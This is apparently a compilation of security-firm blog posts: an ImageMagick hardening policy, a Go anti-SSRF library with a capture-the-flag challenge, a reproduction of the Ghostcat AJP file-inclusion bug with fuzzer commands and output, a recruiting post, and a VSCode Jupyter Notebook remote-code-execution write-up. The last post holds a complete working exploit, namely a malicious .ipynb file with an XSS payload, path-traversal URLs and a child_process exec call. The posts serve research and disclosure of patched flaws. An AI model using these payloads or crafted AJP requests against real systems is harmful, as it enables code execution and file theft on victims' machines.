/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/etc/ImageMagick-6/policy.xml
/usr/local/Cellar/imagemagick@6/6.9.12-60/share/doc/ImageMagick-6/www/source/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/etc/ImageMagick-7/policy.xml
/usr/local/Cellar/imagemagick/7.1.0-45/share/doc/ImageMagick-7/www/source/policy.xml

# Example output on Ubuntu
/usr/local/etc/ImageMagick-7/policy.xml
/usr/local/share/doc/ImageMagick-7/www/source/policy.xml
/opt/ImageMagick-7.0.11-5/config/policy.xml
/opt/ImageMagick-7.0.11-5/www/source/policy.xml

Policies can also be configured using the -limit CLI argument, MagickCore API methods, or with environment variables.

A starter, restrictive policy

Starting from the most restrictive policy described in the official documentation, we designed a restrictive policy gathering all our observations:

<policymap xmlns="">
  <policy domain="resource" name="temporary-path" value="/mnt/magick-conversions-with-restrictive-permissions"/> <!-- the location should only be accessible to the low-privileged user running ImageMagick -->
  <policy domain="resource" name="memory" value="256MiB"/>
  <policy domain="resource" name="list-length" value="32"/>
  <policy domain="resource" name="width" value="8KP"/>
  <policy domain="resource" name="height" value="8KP"/>
  <policy domain="resource" name="map" value="512MiB"/>
  <policy domain="resource" name="area" value="16KP"/>
  <policy domain="resource" name="disk" value="1GiB"/>
  <policy domain="resource" name="file" value="768"/>
  <policy domain="resource" name="thread" value="2"/>
  <policy domain="resource" name="time" value="10"/>
  <policy domain="module" rights="none" pattern="*" /> 
  <policy domain="delegate" rights="none" pattern="*" />
  <policy domain="coder" rights="none" pattern="*" /> 
  <policy domain="coder" rights="write" pattern="{PNG,JPG,JPEG}" /> <!-- your restricted set of acceptable formats, set your rights needs -->
  <policy domain="filter" rights="none" pattern="*" />
  <policy domain="path" rights="none" pattern="@*"/>
  <policy domain="cache" name="memory-map" value="anonymous"/>
  <policy domain="cache" name="synchronize" value="true"/>
  <!-- <policy domain="cache" name="shared-secret" value="my-secret-passphrase" stealth="True"/> Only needed for distributed pixel cache spanning multiple servers -->
  <policy domain="system" name="shred" value="2"/>
  <policy domain="system" name="max-memory-request" value="256MiB"/>
  <policy domain="resource" name="throttle" value="1"/> <!-- Periodically yield the CPU for at least the time specified in ms -->
  <policy xmlns="" domain="system" name="precision" value="6"/>
</policymap>

You can verify that a security policy is active using the identify command:

identify -list policy
Path: ImageMagick/policy.xml
...

You can also play with the above policy using our evaluator tool while developing a tailored one.

safeurl for Go

Do you need a Go HTTP library to protect your applications from SSRF attacks? If so, try safeurl. It’s a one-line drop-in replacement for Go’s net/http client.

No More SSRF in Go Web Apps

When building a web application, it is not uncommon to issue HTTP requests to internal microservices or even external third-party services. Whenever a URL is provided by the user, it is important to ensure that Server-Side Request Forgery (SSRF) vulnerabilities are properly mitigated. As eloquently described in PortSwigger’s Web Security Academy pages, SSRF is a web security vulnerability that allows an attacker to induce the server-side application to make requests to an unintended location.

While libraries mitigating SSRF in numerous programming languages exist, Go didn’t have an easy to use solution. Until now!

safeurl for Go is a library with built-in SSRF and DNS rebinding protection that can easily replace Go’s default net/http client. All the heavy work of parsing, validating and issuing requests is done by the library. The library works out-of-the-box with minimal configuration, while providing developers the customizations and filtering options they might need. Instead of fighting to solve application security problems, developers should be free to focus on delivering quality features to their customers.

This library was inspired by SafeCURL and SafeURL, respectively by Jack Whitton and Include Security. Since no SafeURL for Go existed, Doyensec made it available for the community.

What Does safeurl Offer?

With minimal configuration, the library prevents unauthorized requests to internal, private or reserved IP addresses. All HTTP connections are validated against an allowlist and a blocklist. By default, the library blocks all traffic to private or reserved IP addresses, as defined by RFC1918. This behavior can be updated via the safeurl’s client configuration. The library will give precedence to allowed items, be it a hostname, an IP address or a port. In general, allowlisting is the recommended way of building secure systems. In fact, it’s easier (and safer) to explicitly set allowed destinations, as opposed to having to deal with updating a blocklist in today’s ever-expanding threat landscape.

Installation

Include the safeurl module in your Go program by simply adding github.com/doyensec/safeurl to your project’s go.mod file.

go get -u github.com/doyensec/safeurl

Usage

The safeurl.Client, provided by the library, can be used as a drop-in replacement of Go’s native net/http.Client.

The following code snippet shows a simple Go program that uses the safeurl library:

import (
    "fmt"
    "github.com/doyensec/safeurl"
)

func main() {
    config := safeurl.GetConfigBuilder().
        Build()

    client := safeurl.Client(config)

    resp, err := client.Get("https://example.com")
    if err != nil {
        fmt.Errorf("request return error: %v", err)
    }

    // read response body
}

The minimal library configuration looks something like:

config := GetConfigBuilder().Build()

Using this configuration you get:

  • allowed traffic only for ports 80 and 443
  • allowed traffic which uses HTTP or HTTPS protocols
  • blocked traffic to private IP addresses
  • blocked IPv6 traffic to any address
  • mitigation for DNS rebinding attacks

Configuration

The safeurl.Config is used to customize the safeurl.Client. The configuration can be used to set the following:

AllowedPorts            - list of ports the application can connect to
AllowedSchemes          - list of schemas the application can use
AllowedHosts            - list of hosts the application is allowed to communicate with
BlockedIPs              - list of IP addresses the application is not allowed to connect to
AllowedIPs              - list of IP addresses the application is allowed to connect to
AllowedCIDR             - list of CIDR range the application is allowed to connect to
BlockedCIDR             - list of CIDR range the application is not allowed to connect to
IsIPv6Enabled           - specifies whether communication through IPv6 is enabled
AllowSendingCredentials - specifies whether HTTP credentials should be sent
IsDebugLoggingEnabled   - enables debug logs

Being a wrapper around Go’s native net/http.Client, the library allows you to configure others standard settings as well, such as HTTP redirects, cookie jar settings and request timeouts. Please refer to the official docs for more information on the suggested configuration for production environments.

Configuration examples

To showcase how versatile safeurl.Client is, let us show you a few configuration examples.

It is possible to allow only a single schema:

GetConfigBuilder().
    SetAllowedSchemes("http").
    Build()

Or configure one or more allowed ports:

// This enables only port 8080. All others are blocked (80, 443 are blocked too)
GetConfigBuilder().
    SetAllowedPorts(8080).
    Build()

// This enables only port 8080, 443, 80
GetConfigBuilder().
    SetAllowedPorts(8080, 80, 443). 
    Build()

// **Incorrect.** This configuration will allow traffic to the last allowed port (443), and overwrite any that was set before
GetConfigBuilder().
    SetAllowedPorts(8080).
    SetAllowedPorts(80).
    SetAllowedPorts(443).
    Build()

This configuration allows traffic to only one host, example.com in this case:

GetConfigBuilder().
    SetAllowedHosts("example.com").
    Build()

Additionally, you can block specific IPs (IPv4 or IPv6):

GetConfigBuilder().
    SetBlockedIPs("1.2.3.4").
    Build()

Note that with the previous configuration, the safeurl.Client will block the IP 1.2.3.4 in addition to all IPs belonging to internal, private or reserved networks.

If you wish to allow traffic to an IP address, which the client blocks by default, you can use the following configuration:

GetConfigBuilder().
    SetAllowedIPs("10.10.100.101").
    Build()

It’s also possible to allow or block full CIDR ranges instead of single IPs:

GetConfigBuilder().
    EnableIPv6(true).
    SetBlockedIPsCIDR("34.210.62.0/25", "216.239.34.0/25", "2001:4860:4860::8888/32").
    Build()

DNS Rebinding mitigation

DNS rebinding attacks are possible due to a mismatch in the DNS responses between two (or more) consecutive HTTP requests. This vulnerability is a typical TOCTOU problem. At the time-of-check (TOC), the IP points to an allowed destination. However, at the time-of-use (TOU), it will point to a completely different IP address.

DNS rebinding protection in safeurl is accomplished by performing the allow/block list validations on the actual IP address which will be used to make the HTTP request. This is achieved by utilizing Go’s net/dialer package and the provided Control hook. As stated in the official documentation:

// If Control is not nil, it is called after creating the network
// connection but before actually dialing.
Control func(network, address string, c syscall.RawConn) error

In our safeurl implementation, the IPs validation happens inside the Control hook. The following snippet shows some of the checks being performed. If all of them pass, the HTTP dial occurs. In case a check fails, the HTTP request is dropped.

func buildRunFunc(wc *WrappedClient) func(network, address string, c syscall.RawConn) error {

return func(network, address string, _ syscall.RawConn) error {
	// [...]
	if wc.config.AllowedIPs == nil && isIPBlocked(ip, wc.config.BlockedIPs) {
		wc.log(fmt.Sprintf("ip: %v found in blocklist", ip))
		return &AllowedIPError{ip: ip.String()}
	}

	if !isIPAllowed(ip, wc.config.AllowedIPs) && isIPBlocked(ip, wc.config.BlockedIPs) {
		wc.log(fmt.Sprintf("ip: %v not found in allowlist", ip))
		return &AllowedIPError{ip: ip.String()}
	}

	return nil
}
}

Help Us Make safeurl Better (and Safer)

We’ve performed extensive testing during the library development. However, we would love to have others pick at our implementation.

β€œGiven enough eyes, all bugs are shallow”. Hopefully.

Connect to http://164.92.85.153/ and attempt to catch the flag hosted on this internal (and unauthorized) URL: http://164.92.85.153/flag

The challenge was shut down on 01/13/2023. You can always run the challenge locally, by using the code snippet below.

This is the source code of the challenge endpoint, with the specific safeurl configuration:

func main() {
	cfg := safeurl.GetConfigBuilder().
		SetBlockedIPs("164.92.85.153").
		SetAllowedPorts(80, 443).
		Build()

	client := safeurl.Client(cfg)

	router := gin.Default()

	router.GET("/webhook", func(context *gin.Context) {
		urlFromUser := context.Query("url")
		if urlFromUser == "" {
			errorMessage := "Please provide an url. Example: /webhook?url=your-url.com\n"
			context.String(http.StatusBadRequest, errorMessage)
		} else {
			stringResponseMessage := "The server is checking the url: " + urlFromUser + "\n"

			resp, err := client.Get(urlFromUser)

			if err != nil {
				stringError := fmt.Errorf("request return error: %v", err)
				fmt.Print(stringError)
				context.String(http.StatusBadRequest, err.Error())
				return
			}

			defer resp.Body.Close()
			bodyString, err := io.ReadAll(resp.Body)

			if err != nil {
				context.String(http.StatusInternalServerError, err.Error())
				return
			}

			fmt.Print("Response from the server: " + stringResponseMessage)
			fmt.Print(resp)
			context.String(http.StatusOK, string(bodyString))
		}
	})

	router.GET("/flag", func(context *gin.Context) {
		ip := context.RemoteIP()
		nip := net.ParseIP(ip)
		if nip != nil {
			if nip.IsLoopback() {
				context.String(http.StatusOK, "You found the flag")
			} else {
				context.String(http.StatusForbidden, "")
			}
		} else {
			context.String(http.StatusInternalServerError, "")
		}
	})

	router.GET("/", func(context *gin.Context) {

		indexPage := "<!DOCTYPE html><html lang=\"en\"><head><title>SafeURL - challenge</title></head><body>...</body></html>"
		context.Writer.Header().Set("Content-Type", "text/html; charset=UTF-8")
		context.String(http.StatusOK, indexPage)
	})

	router.Run("127.0.0.1:8080")
}


If you are able to bypass the check enforced by the safeurl.Client, the content of the flag will give you further instructions on how to collect your reward. Please note that unintended ways of getting the flag (e.g., not bypassing safeurl.Client) are considered out of scope.

Feel free to contribute with pull requests, bug reports or enhancements ideas.

This tool was possible thanks to the 25% research time at Doyensec. Tune in again for new episodes.

Let's speak AJP

Introduction

AJP (Apache JServ Protocol) is a binary protocol developed in 1997 with the goal of improving the performance of the traditional HTTP/1.1 protocol especially when proxying HTTP traffic between a web server and a J2EE container. It was originally created to manage efficiently the network throughput while forwarding requests from server A to server B.

A typical use case for this protocol is shown below: AJP schema

During one of my recent research weeks at Doyensec, I studied and analyzed how this protocol works and its implementation within some popular web servers and Java containers. The research also aimed at reproducing the infamous Ghostcat (CVE-2020-1938) vulnerability discovered in Tomcat by Chaitin Tech researchers, and potential discovering other look-alike bugs.

Ghostcat

This vulnerability affected the AJP connector component of the Apache Tomcat Java servlet container, allowing malicious actors to perform local file inclusion from the application root directory. In some circumstances, this issue would allow attackers to perform arbitrary command execution. For more details about Ghostcat, please refer to the following blog post: https://hackmag.com/security/apache-tomcat-rce/

Communicating via AJP

Back in 2017, our own Luca Carettoni developed and released one of the first, if not the first, open source libraries implementing the Apache JServ Protocol version 1.3 (ajp13). With that, he also developed AJPFuzzer. Essentially, this is a rudimental fuzzer that makes it easy to send handcrafted AJP messages, run message mutations, test directory traversals and fuzz on arbitrary elements within the packet.

With minor tuning, AJPFuzzer can be also used to quickly reproduce the GhostCat vulnerability. In fact, we’ve successfully reproduced the attack by sending a crafted forwardrequest request including the javax.servlet.include.servlet_path and javax.servlet.include.path_info Java attributes, as shown below:

$ java -jar ajpfuzzer_v0.7.jar

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

Once connected to the target host, send the malicious ForwardRequest packet message and verify the discosure of the test.xml file:

$ AJPFuzzer/192.168.80.131:8009> forwardrequest 2 "HTTP/1.1" "/" 127.0.0.1 192.168.80.131 192.168.80.131 8009 false "Cookie:test=value" "javax.servlet.include.path_info:/WEB-INF/test.xml,javax.servlet.include.servlet_path:/"


[*] Sending Test Case '(2) forwardrequest'
[*] 2022-10-13 23:02:45.648


... trimmed ...


[*] Received message type 'Send Body Chunk'
[*] Received message description 'Send a chunk of the body from the servlet container to the web server.
Content (HEX):
0x3C68656C6C6F3E646F79656E7365633C2F68656C6C6F3E0A
Content (Ascii):
<hello>doyensec</hello>
'
[*] 2022-10-13 23:02:46.859


00000000 41 42 00 1C 03 00 18 3C 68 65 6C 6C 6F 3E 64 6F AB.....<hello>do
00000010 79 65 6E 73 65 63 3C 2F 68 65 6C 6C 6F 3E 0A 00 yensec</hello>..


[*] Received message type 'End Response'
[*] Received message description 'Marks the end of the response (and thus the request-handling cycle). Reuse? Yes'
[*] 2022-10-13 23:02:46.86

The server AJP connector will receive an AJP message with the following structure:

AJP schema wireshark

The combination of libajp13, AJPFuzzer and the Wireshark AJP13 dissector made it easier to understand the protocol and play with it. For example, another noteworthy test case in AJPFuzzer is named genericfuzz. By using this command, it’s possible to perform fuzzing on arbitrary elements within the AJP request, such as the request attributes name/value, secret, cookies name/value, request URI path and much more:

$ AJPFuzzer> connect 192.168.80.131 8009
connect 192.168.80.131 8009
[*] Connecting to 192.168.80.131:8009
Connected to the remote AJP13 service

$ AJPFuzzer/192.168.80.131:8009> genericfuzz 2 "HTTP/1.1" "/" "127.0.0.1" "127.0.0.1" "127.0.0.1" 8009 false "Cookie:AAAA=BBBB" "secret:FUZZ" /tmp/listFUZZ.txt

AJP schema fuzz

Takeaways

Web binary protocols are fun to learn and reverse engineer.

For defenders:

  • Do not expose your AJP interfaces in hostile networks. Instead, consider switching to HTTP/2
  • Protect the AJP interface by enabling a shared secret. In this case, the workers must also include a matching value for the secret

Recruiting Security Researchers Remotely

At Doyensec, the application security engineer recruitment process is 100% remote. As the final step, we used to organize an onsite interview in Warsaw for candidates from Europe and in New York for candidates from the US. It was like that until 2020, when the Covid pandemic forced us to switch to a 100% remote recruitment model and hire people without meeting them in person.

Banner Recruiting Post

We have conducted recruitment interviews with candidates from over 25 countries. So how did we build a process that, on the one hand, is inclusive for people of different nationalities and cultures, and on the other hand, allows us to understand the technical skills of a given candidate?

The recruitment process below is the result of the experience gathered since 2018.

Introduction Call

Before we start the recruitment process of a given candidate, we want to get to know someone better. We want to understand their motivations for changing the workplace as well as what they want to do in the next few years. Doyensec only employs people with a specific mindset, so it is crucial for us to get to know someone before asking them to present their technical skills.

During our initial conversation, our HR specialist will tell a candidate more about the company, how we work, where our clients come from and the general principles of cooperation with us. We will also leave time for the candidate so that they can ask any questions they want.

What do we pay attention to during the introduction call?

  • Knowledge of the English language for applicants who are not native speakers
  • Professionalism - although people come from different cultures, professionalism is international
  • Professional experience that indicates the candidate has the background to be successful in the relevant role with us
  • General character traits that can tell us if someone will fit in well with our team

If the financial expectations of the candidate are in line with what we can offer and we feel good about the candidate, we will proceed to the first technical skills test.

Source Code Challenge

At Doyensec, we frequently deal with source code that is provided by our clients. We like to combine source code analysis with dynamic testing. We believe this combination will bring the highest ROI to our customers. This is why we require each candidate to be able to analyze application source code.

Our source code challenge is arranged such that, at the agreed time, we send an archive of source code to the candidate and ask them to find as many vulnerabilities as possible within 2 hours. They are also asked to prepare short descriptions of these vulnerabilities according to the instructions that we send along with the challenge. The aim of this assignment is to understand how well the candidate can analyze the source code and also how efficiently they can work under time pressure.

We do not reveal in advance what programming languages are in our tests, but they should expect the more popular ones. We don’t test on niche languages as our goal is to check if they are able to find vulnerabilities in real-world code, not to try to stump them with trivia or esoteric challenges.

We feel nothing beats real-world experience in coding and reviewing code for vulnerabilities. Beyond that, examples of the academic knowledge necessary to pass our code review challenge is similar (but not limited) to what you’d find in the following resources:

Technical Interview

After analyzing the results of the first challenge, we decide whether to invite the candidate to the first technical interview. The interview is usually conducted by our Consulting Director or one of the more experienced consultants.

The interview will last about 45 minutes where we will ask questions that will help us understand the candidates’ skillsets and determine their level of seniority. During this conversation, we will also ask about mistakes made during the source code challenge. We want to understand why someone may have reported a vulnerability when it is not there or perhaps why someone missed a particular, easy to detect vulnerability.

We also encourage candidates to ask questions about how we work, what tools and techniques we use and anything else that may interest the candidate.

The knowledge necessary to be successful in this phase of the process comes from real-world experience, coupled with academic knowledge from sources such as these:

Web Challenge

At four hours in length, our Web Challenge is our last and longest test of technical skills. At an agreed upon time, we send the candidate a link to a web application that contains a certain number of vulnerabilities and the candidate’s task is to find as many vulnerabilities as possible and prepare a simplified report. Unlike the previous technical challenge where we checked the ability to read the source code, this is a 100% blackbox test.

We recommend candidates to feel comfortable with topics similar to those covered at the Portswigger Web Security Academy, or the training/CTFs available through sites such as HackerOne, prior attempting this challenge.

If the candidate passes this stage of the recruitment process, they will only have one last stage, an interview with the founders of the company.

Final Interview

The last stage of recruitment isn’t so much an interview but rather, more of a summary of the entire process. We want to talk to the candidate about their strengths, better understand their technical weaknesses and any mistakes they made during the previous steps in the process. In particular, we always like to distinguish errors that come from the lack of knowledge versus the result of time pressure. It’s a very positive sign when candidates who reach this stage have reflected upon the process and taken steps to improve in any areas they felt less comfortable with.

The last interview is always carried out by one of the founders of the company, so it’s a great opportunity to learn more about Doyensec. If someone reaches this stage of the recruitment process, it is highly likely that our company will make them an offer. Our offers are based on their expectations as well as what value they bring to the organization. The entire recruitment process is meant to guarantee that the employee will be satisfied with the work and meet the high standards Doyensec has for its team.

The entire recruitment process takes about 8 hours of actual time, which is only one working day, total. So, if the candidate is reactive, the entire recruitment process can usually be completed in about 2 weeks or less.

If you are looking for more information about working @Doyensec, visit our career page and check out our job openings.

Summary Recruiting Process

Visual Studio Code Jupyter Notebook RCE

I spared a few hours over the past weekend to look into the exploitation of this Visual Studio Code .ipynb Jupyter Notebook bug discovered by Justin Steven in August 2021.

Justin discovered a Cross-Site Scripting (XSS) vulnerability affecting the VSCode built-in support for Jupyter Notebook (.ipynb) files.

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src=x onerror='console.log(1)'>"}
        }
      ]
    }
  ]
}

His analysis details the issue and shows a proof of concept which reads arbitrary files from disk and then leaks their contents to a remote server, however it is not a complete RCE exploit.

I could not find a way to leverage this XSS primitive to achieve arbitrary code execution, but someone more skilled with Electron exploitation may be able to do so. […]

Given our focus on ElectronJs (and many other web technologies), I decided to look into potential exploitation venues.

As the first step, I took a look at the overall design of the application in order to identify the configuration of each BrowserWindow/BrowserView/Webview in use by VScode. Facilitated by ElectroNG, it is possible to observe that the application uses a single BrowserWindow with nodeIntegration:on.

ElectroNG VScode

This BrowserWindow loads content using the vscode-file protocol, which is similar to the file protocol. Unfortunately, our injection occurs in a nested sandboxed iframe as shown in the following diagram:

VScode BrowserWindow Design

In particular, our sandbox iframe is created using the following attributes:

allow-scripts allow-same-origin allow-forms allow-pointer-lock allow-downloads

By default, sandbox makes the browser treat the iframe as if it was coming from another origin, even if its src points to the same site. Thanks to the allow-same-origin attribute, this limitation is lifted. As long as the content loaded within the webview is also hosted on the local filesystem (within the app folder), we can access the top window. With that, we can simply execute code using something like top.require('child_process').exec('open /System/Applications/Calculator.app');

So, how do we place our arbitrary HTML/JS content within the application install folder?

Alternatively, can we reference resources outside that folder?

The answer comes from a recent presentation I watched at the latest Black Hat USA 2022 briefings. In exploiting CVE-2021-43908, TheGrandPew and s1r1us use a path traversal to load arbitrary files outside of VSCode installation path.

vscode-file://vscode-app/Applications/Visual Studio Code.app/Contents/Resources/app/..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F/somefile.html

Similarly to their exploit, we can attempt to leverage a postMessage’s reply to leak the path of current user directory. In fact, our payload can be placed inside the malicious repository, together with the Jupyter Notebook file that triggers the XSS.

After a couple of hours of trial-and-error, I discovered that we can obtain a reference of the img tag triggering the XSS by forcing the execution during the onload event.

Path Leak VScode

With that, all of the ingredients are ready and I can finally assemble the final exploit.

var apploc = '/Applications/Visual Studio Code.app/Contents/Resources/app/'.replace(/ /g, '%20');
var repoloc;
window.top.frames[0].onmessage = event => {
    if(event.data.args.contents && event.data.args.contents.includes('<base href')){  
        var leakloc = event.data.args.contents.match('<base href=\"(.*)\"')[1];
        var repoloc = leakloc.replace('https://file%2B.vscode-resource.vscode-webview.net','vscode-file://vscode-app'+apploc+'..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..');
        setTimeout(async()=>console.log(repoloc+'poc.html'), 3000)
        location.href=repoloc+'poc.html';
    }
};
window.top.postMessage({target: window.location.href.split('/')[2],channel: 'do-reload'}, '*');

To deliver this payload inside the .ipynb file we still need to overcome one last limitation: the current implementation results in a malformed JSON. The injection happens within a JSON file (double-quoted) and our Javascript payload contains quoted strings as well as double-quotes used as a delimiter for the regular expression that is extracting the path.

After a bit of tinkering, the easiest solution involves the backtick ` character instead of the quote for all JS strings.

The final pocimg.ipynb file looks like:

{
  "cells": [
    {
      "cell_type": "code",
      "execution_count": null,
      "source": [],
      "outputs": [
        {
          "output_type": "display_data",
          "data": {"text/markdown": "<img src='a445fff1d9fd4f3fb97b75202282c992.png' onload='var apploc = `/Applications/Visual Studio Code.app/Contents/Resources/app/`.replace(/ /g, `%20`);var repoloc;window.top.frames[0].onmessage = event => {if(event.data.args.contents && event.data.args.contents.includes(`<base href`)){var leakloc = event.data.args.contents.match(`<base href=\"(.*)\"`)[1];var repoloc = leakloc.replace(`https://file%2B.vscode-resource.vscode-webview.net`,`vscode-file://vscode-app`+apploc+`..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..%2F..`);setTimeout(async()=>console.log(repoloc+`poc.html`), 3000);location.href=repoloc+`poc.html`;}};window.top.postMessage({target: window.location.href.split(`/`)[2],channel: `do-reload`}, `*`);'>"}
        }
      ]
    }
  ]
}

By opening a malicious repository with this file, we can finally trigger our code execution.


The built-in Jupyter Notebook extension opts out of the protections given by the Workspace Trust feature introduced in Visual Studio Code 1.57, hence no further user interaction is required. For the record, this issue was fixed in VScode 1.59.1 and Microsoft assigned CVE-2021-26437 to it.

❌